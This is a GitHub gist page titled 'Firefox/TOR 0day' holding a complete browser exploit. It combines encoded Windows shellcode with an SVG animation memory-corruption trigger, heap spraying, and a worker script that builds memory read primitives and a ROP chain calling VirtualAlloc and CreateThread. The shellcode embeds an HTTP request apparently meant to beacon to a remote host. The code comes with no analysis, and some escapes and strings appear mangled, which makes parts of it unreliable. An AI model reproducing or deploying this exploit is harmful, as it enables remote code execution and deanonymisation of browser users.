Skip to content

Instantly share code, notes, and snippets.

@dave-theunsub

dave-theunsub/cssbanner.js

Created November 30, 2016 09:57
Show Gist options
  • Save dave-theunsub/5556bc2d282116d04cb34583d733905f to your computer and use it in GitHub Desktop.
Save dave-theunsub/5556bc2d282116d04cb34583d733905f to your computer and use it in GitHub Desktop.
Download ZIP
Firefox/TOR 0day
Raw
cssbanner.js
<html>
<head>
<script>
var thecode = '\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30\u0c52\u528b\u8b14\u2872\ub70f\u264a\uff31\uc031\u3cac\u7c61\u2c02\uc120\u0dcf\uc701\uf0e2\u5752\u528b\u8b10\u3c42\ud001\u408b\u8578\u74c0\u014a\u50d0\u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b34\ud601\uff31\uc031\uc1ac\u0dcf\uc701\ue038\uf475\u7d03\u3bf8\u247d\ue275\u8b58\u2458\ud301\u8b66\u4b0c\u588b\u011c\u8bd3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u515a\ue0ff\u5f58\u8b5a\ueb12\u5d86\u858d\u0297\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u0185\u0000\u858d\u029e\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u8029\u006b\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050\u5050\u5040\u5040\uea68\udf0f\uffe0\u31d5\uf7db\u39d3\u0fc3\u3a84\u0001\u8900\u68c3\u2705\ue21b\u6866\u5000\uc931\uc180\u6602\u8951\u6ae2\u5210\u6853\ua599\u6174\ud5ff\uc085\u0874\u8dfe\u0248\u0000\ud775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\ude49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6\u0000\ue857\u00fa\u0000\u895e\u8dca\ua7bd\u0002\
ue800\ u00ec\ u0000\ u834f\ u20fa\ u057c\ u20ba\ u0000\ u8900\ u56d1\ ua4f3\ u0db9\ u0000\ u8d00\ u8ab5\ u0002\ uf300\ u89a4\ u44bd\ u0002\ u5e00\ u6856\ u28a9\ u8034\ ud5ff\ uc085\ u840f \u00ae\u0000\u8b66\u0a48\u8366\u04f9\u820f\u00a0\u0000\u408d\u8b0c\u8b00\u8b08\ub809\u0100\u0000\u8950\u29e7\u89c4\u57e6\u5156\u6851\u7248\ub8d2\ud5ff\uc085\uc481\u0104\u0000\ub70f\u830f\u06f9\u7072\u06b9\u0000\ub800\u0010\u0000\uc429\ue789\uca89\ue2d1\u5250\ud231\u168a\ud088\uf024\ue8c0\u3c04\u7709\u0404\ueb30\u0402\u8837\u4707\ud088\u0f24\u093c\u0477\u3004\u02eb\u3704\u0788\u4647\ud4e2\u2959\u89cf\u58fe\uc401\ubd8b\u0244\u0000\ua4f3\u36e8\u0000\u3100\u50c0\u2951\u4fcf\u5357\uc268\u38eb\uff5f\uebd5\u6a09\u6800\u1347\u6f72\ud5ff\u6853\u6e75\u614d\ud5ff\uedeb\uc931\ud1f7\uc031\uaef2\ud1f7\uc349\u0000\u0000\u8d03\ua7bd\u0002\ue800\uffe4\uffff\ub94f\u004f\u0000\ub58d\u026e\u0000\ua4f3\ubd8d\u02a7\u0000\ucbe8\uffff\uc3ff\u0a0d\u6341\u6563\u7470\u452d\u636e\u646f\u6e69\u3a67\u6720\u697a\u0d70\u0d0a\u000a\u0a0d\u6f43\u6b6f\u6569\u203a\u434d\u773d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u4700\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\u3063\u3132\u2032\u5448\u5054\u312f\u312e\u0a0d\
u6f48\u7473\u203a\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u4190';
var worker = new Worker('cssbanner.js');
worker.postMessage(thecode);
var svgns = 'http://www.w3.org/2000/svg';
var heap80 = new Array(0x1000);
var heap100 = new Array(0x4000);
var block80 = new ArrayBuffer(0x80);
var block100 = new ArrayBuffer(0x100);
var sprayBase = undefined;
var arrBase = undefined;
var animateX = undefined;
var containerA = undefined;
var offset = 0x90;
if (/.*Firefox\/(4[7-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)) {
offset = 0x88; // versions 47.0 or greater
}
var $ = function(id) {
return document.getElementById(id);
}
var exploit = function() {
var u32 = new Uint32Array(block80)
u32[0x2] = arrBase - offset;
u32[0x8] = arrBase - offset;
u32[0xE] = arrBase - offset;
for (i = heap100.length / 2; i < heap100.length; i++) {
heap100[i] = block100.slice(0)
}
for (i = 0; i < heap80.length / 2; i++) {
heap80[i] = block80.slice(0)
}
animateX.setAttribute('begin', '59s')
animateX.setAttribute('begin', '58s')
for (i = heap80.length / 2; i < heap80.length; i++) {
heap80[i] = block80.slice(0)
}
for (i = heap100.length / 2; i < heap100.length; i++) {
heap100[i] = block100.slice(0)
}
animateX.setAttribute('begin', '10s')
animateX.setAttribute('begin', '9s')
window.dump('PAUSING!!! YAYA');
containerA.pauseAnimations();
}
worker.onmessage = function(e) {
worker.onmessage = function(e) {
window.setTimeout(function() {
worker.terminate();
document.body.innerHTML = '';
document.getElementsByTagName('head')[0].innerHTML = '';
document.body.setAttribute('onload', '')
}, 1000);
}
arrBase = e.data;
exploit();
}
var idGenerator = function() {
return 'id' +
(((1 + Math.random()) * 0x10000) | 0).toString(16).substring(1);
}
var craftDOM = function() {
containerA = document.createElementNS(svgns, 'svg')
var containerB = document.createElementNS(svgns, 'svg');
animateX = document.createElementNS(svgns, 'animate')
var animateA = document.createElementNS(svgns, 'animate')
var animateB = document.createElementNS(svgns, 'animate')
var animateC = document.createElementNS(svgns, 'animate')
var idX = idGenerator();
var idA = idGenerator();
var idB = idGenerator();
var idC = idGenerator();
animateX.setAttribute('id', idX);
animateA.setAttribute('id', idA);
animateA.setAttribute('end', '50s');
animateB.setAttribute('id', idB);
animateB.setAttribute('begin', '60s');
animateB.setAttribute('end', idC + '.end');
animateC.setAttribute('id', idC);
animateC.setAttribute('begin', '10s');
animateC.setAttribute('end', idA + '.end');
containerA.appendChild(animateX)
containerA.appendChild(animateA)
containerA.appendChild(animateB)
containerB.appendChild(animateC)
document.body.appendChild(containerA);
document.body.appendChild(containerB);
}
window.onload = craftDOM;
//
</script>
<style>
#mtdiv {
position: absolute;
width: 960px;
height: 166px;
z-index: 15;
top: 100px;
left: 50%;
margin: 0 0 0 -480px;
}
</style>
</head>
<body bgcolor='#2F3236'>
<div id='mtdiv'>
<img src='mt.png' />
</div>
</body>
<script>
setTimeout('window.location = \'member.php\';', 2000);
</script>
</html>
<!-- content of "cssbanner.js" -->
<script>
self.onmessage = function(msg) {
thecode = msg.data;
var pack = function(b) {
var a = b >> 16;
return String.fromCharCode(b & 65535) + String.fromCharCode(a)
};
function Memory(b, a, f) {
this._base_addr = b;
this._read = a;
this._write = f;
this._abs_read = function(a) {
a >= this._base_addr ? a = this._read(a - this._base_addr) : (a = 4294967295 - this._base_addr + 1 + a, a = this._read(a));
return 0 > a ? 4294967295 + a + 1 : a
};
this._abs_write = function(a, b) {
a >= this._base_addr ? this._write(a - this._base_addr, b) : (a = 4294967295 - this._base_addr + 1 + a, this._write(a, b))
};
this.readByte = function(a) {
return this.read(a) & 255
};
this.readWord = function(a) {
return this.read(a) & 65535
};
this.readDword = function(a) {
return this.read(a)
};
this.read = function(a, b) {
if (a % 4) {
var c = this._abs_read(a & 4294967292),
d = this._abs_read(a + 4 & 4294967292),
e = a % 4;
return c >>> 8 * e | d <<
8 * (4 - e)
}
return this._abs_read(a)
};
this.readStr = function(a) {
for (var b = "", c = 0;;) {
if (32 == c) return "";
var d = this.readByte(a + c);
if (0 == d) break;
b += String.fromCharCode(d);
c++
}
return b
};
this.write = function(a) {}
}
function PE(b, a) {
this.mem = b;
this.export_table = this.module_base = void 0;
this.export_table_size = 0;
this.import_table = void 0;
this.import_table_size = 0;
this.find_module_base = function(a) {
for (a &= 4294901760; a;) {
if (23117 == this.mem.readWord(a)) return this.module_base = a;
a -= 65536
}
};
this._resolve_pe_structures = function() {
peFile = this.module_base + this.mem.readWord(this.module_base + 60);
if (17744 != this.mem.readDword(peFile)) throw "Bad
NT
Signature ";this.pe_file=peFile;this.optional_header=this.pe_file+36;this.export_directory=t his.module_base+this.mem.readDword(this.pe_file+120);this.export_directory_size=this.mem.readDword(this.pe_file+124);this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);this.import_directory_size=this.mem.readDword(this.pe_file+132)};this.resolve_imported_function=function(a,b){void 0==this.import_directory&&this._resolve_pe_structures();for(var e=this.import_directory,c=e+this.import_directory_size;e<c;){var d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);if(a.toUpperCase()==d .toUpperCase()){for(var c=this.mem.readDword(e)+this.module_base,e=this.mem.readDword(e+16)+this.module_base,d=this.mem.readDword(c),f=0;0!=d;){if(this.mem.readStr(d+this.module_base+2).toUpperCase()==b.toUpperCase())return this.mem.readDword(e+4*f);f++;d=this.mem.readDword(c+4*f)}break}e+=20}return 0};void 0!=a&&this.find_module_base(a)} function ROP(b,a){this.mem=b;this.pe=new PE(b,a);this.pe._resolve_pe_structures();this.module_base=this.pe.module_base+4096;this.findSequence=function(a){for(var b=0;;){for(var e=0,c=0;c<a.length;c++)if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c)e++;else break;if(e==a.length)return this.module_base+b;b++}};this.findStackPivot=function(){return this.findSequence([148,195])};this.findPopRet=function(a){return this.findSequence([88,195])};this.ropChain=function(a,b,e,c){c=void 0!=c?c:new ArrayBuffer(4096); c=new Uint32Array(c);var d=this.findStackPivot(),f=this.findPopRet( "
EAX "),g=this.pe.resolve_imported_function( "
kernel32.dll ", "
VirtualAlloc ");c[0]=f+1;c[1]=f;c[2]=a+b+4*e+4;c[3]=d;for(i=0;i<e;i++)c[(b>>2)+i]=d;d=(b+4>>2)+e;c[d++]=g;c[d++]=a+(b+4*e+28);c[d++]=a;c[d++]=4096;c[d++]=4096;c[d++]=64;c[d++]=3435973836;return c}} var conv=new ArrayBuffer(8),convf64=new Float64Array(conv),convu32=new Uint32Array(conv),qword2Double=function(b,a){convu32[0]=b;convu32[1]=a;return convf64[0]},doubleFromFloat=function(b,a){convf64[0]=b;return convu32[a]},sprayArrays=function(){for(var b=Array(262138),a=0;262138>a;a++)b[a]=fzero;for(a=0;a <
b.length;
a += 512) b[a + 1] = memory, b[a + 21] = qword2Double(0, 2), b[a + 14] = qword2Double(arrBase + o1, 0), b[a + (o1 + 8) / 8] = qword2Double(arrBase + o2, 0), b[a + (o2 + 0) / 8] = qword2Double(2, 0), b[a + (o2 + 8) / 8] = qword2Double(arrBase + o3, arrBase + 13), b[a + (o3 + 0) / 8] = qword2Double(16, 0), b[a + (o3 + 24) / 8] = qword2Double(2, 0), b[a + (o3 + 32) / 8] = qword2Double(arrBase + o5, arrBase + o4), b[a + (o4 + 0) / 8] = qword2Double(0, arrBase + o6), b[a + (o5 + 0) / 8] = qword2Double(arrBase + o7, 0), b[a + (o6 + 8) / 8] = qword2Double(2, 0), b[a + (o7 + 8) / 8] = qword2Double(arrBase + o7 + 16, 0), b[a + (o7 + 16) / 8] = qword2Double(0, 4026531840), b[a + (o7 + 32) / 8] = qword2Double(0, 3220176896), b[a + (o7 + 48) / 8] = qword2Double(2, 0), b[a + (o7 + 56) / 8] = qword2Double(1, 0), b[a + (o7 + 96) / 8] = qword2Double(arrBase + o8, arrBase + o8), b[a + (o7 + 112) / 8] = qword2Double(arrBase + o9, arrBase + o9 + 16), b[a + (o7 + 168) / 8] = qword2Double(0, 2), b[a + (o9 + 0) / 8] = qword2Double(arrBase + o10, 2), b[a + (o10 + 0) / 8] = qword2Double(2, 0), b[a + (o10 + 8) / 8] = qword2Double(0, 268435456), b[a + (o11 + 8) / 8] = qword2Double(arrBase + o11 + 16, 0), b[a + (o11 + 16) / 8] = qword2Double(0, 4026531840), b[a + (o11 + 32) / 8] = qword2Double(0, 3220176896), b[a + (o11 + 48) / 8] = qword2Double(2, 0), b[a + (o11 + 56) / 8] = qword2Double(1, 0), b[a + (o11 + 96) / 8] = qword2Double(arrBase + o8, arrBase + o8), b[a + (o11 + 112) / 8] = qword2Double(arrBase + o9, arrBase + o9 + 16), b[a + (o11 + 168) / 8] = qword2Double(0, 2);
for (a = 0; a < spr.length; a++) spr[a] = b.slice(0)
}, vtable_offset = 300;
/.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent) ? vtable_offset = 304 : /.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent) && (vtable_offset = 308);
var spr = Array(400),
arrBase = 805306416,
ropArrBuf = new ArrayBuffer(4096),
o1 = 176,
o2 = 256,
o3 = 768,
o4 = 832,
o5 = 864,
o6 = 928,
o7 = 1024,
o8 = 1280,
o9 = 1344,
o10 = 1376,
o11 = 1536,
oRop = 1792,
memory = new Uint32Array(16),
len = memory.length,
arr_index = 0,
arr_offset = 0;
fzero = qword2Double(0, 0);
0 != thecode.length % 2 && (thecode += "\u9090");
sprayArrays();
postMessage(arrBase);
for (memarrayloc = void 0; void 0 == memarrayloc;)
for (i = 0; i < spr.length; i++)
for (offset = 0; offset < spr[i].length; offset += 512)
if ("object" != typeof spr[i][offset + 1]) {
memarrayloc = doubleFromFloat(spr[i][offset + 1], 0);
arr_index = i;
arr_offset = offset;
spr[i][offset + (o2 + 0) / 8] = qword2Double(65, 0);
spr[i][offset + (o2 + 8) / 8] = qword2Double(arrBase + o3, memarrayloc + 27);
for (j = 0; 33 > j; j++) spr[i][offset + (o2 + 16) / 8 + j] = qword2Double(memarrayloc + 27, memarrayloc + 27);
spr[i][offset + (o3 + 8) / 8] = qword2Double(0, 0);
spr[i][offset + (o5 + 0) / 8] = qword2Double(arrBase + o11, 0);
spr[i][offset + (o7 + 168) / 8] = qword2Double(0, 3);
spr[i][offset + (o7 + 88) / 8] = qword2Double(0, 2);
break
}
for (; memory.length == len;);
var mem = new Memory(memarrayloc + 48, function(b) {
return memory[b / 4]
}, function(b, a) {
memory[b / 4] = a
}),
xulPtr = mem.readDword(memarrayloc + 12);
spr[arr_index][arr_offset + 1] = ropArrBuf;
ropPtr = mem.readDword(arrBase + 8);
spr[arr_index][arr_offset + 1] = null;
ropBase = mem.readDword(ropPtr + 16);
var rop = new ROP(mem, xulPtr);
rop.ropChain(ropBase, vtable_offset, 10, ropArrBuf);
var backupESP = rop.findSequence([137, 1, 195]),
ropChain = new Uint32Array(ropArrBuf);
ropChain[0] = backupESP;
CreateThread = rop.pe.resolve_imported_function("KERNEL32.dll", "CreateThread");
for (var i = 0; i <
ropChain.length && 3435973836 != ropChain[i]; i++);
ropChain[i++] = 3296825488;
ropChain[i++] = 2048;
ropChain[i++] = 1347469361;
ropChain[i++] = 1528949584;
ropChain[i++] = 3092271187;
ropChain[i++] = CreateThread;
ropChain[i++] = 3096498431;
ropChain[i++] = arrBase + 16;
ropChain[i++] = 1955274891;
ropChain[i++] = 280697892;
ropChain[i++] = 704643071;
ropChain[i++] = 2425406428;
ropChain[i++] = 4294957800;
ropChain[i++] = 2425393407;
for (var j = 0; j < thecode.length; j += 2) ropChain[i++] = thecode.charCodeAt(j) + 65536 * thecode.charCodeAt(j + 1);
spr[arr_index][arr_offset] = qword2Double(arrBase + 16, 0);
spr[arr_index][arr_offset + 3] = qword2Double(0, 256);
spr[arr_index][arr_offset + 2] = qword2Double(ropBase, 0);
spr[arr_index][arr_offset + (o11 + 168) / 8] = qword2Double(0, 3);
spr[arr_index][arr_offset + (o11 + 88) / 8] = qword2Double(0, 2);
postMessage("GREAT SUCCESS "); };
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment